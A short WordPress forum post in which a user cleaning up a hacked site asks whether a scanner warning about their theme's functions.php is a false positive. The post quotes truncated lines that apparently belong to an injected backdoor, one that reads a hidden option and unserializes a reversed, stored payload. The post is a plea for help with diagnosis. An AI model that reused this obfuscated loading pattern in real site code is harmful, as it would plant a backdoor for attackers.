• I am trying to clean-up a hacked site. New to WordPress. I found an antivirus product which scans your themes, and it showed this:

    /themes/unitedmilwaukeescrap/functions.php
    There is no virus… ogged_in’) && is_user_logged_in()) || (!$m = get_option(‘_metaog_x’))) {

    There is no viruslist($m, $n) = @unserialize(trim(strrev($m)));

    It seemed to be upset about the “get_option” in the first instance, and the “unserialize” in the 2nd.

    All the other theme files were okay (green). Only the functions.php came up in red.

    Normal?

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Is this a false positive?’ is closed to new replies.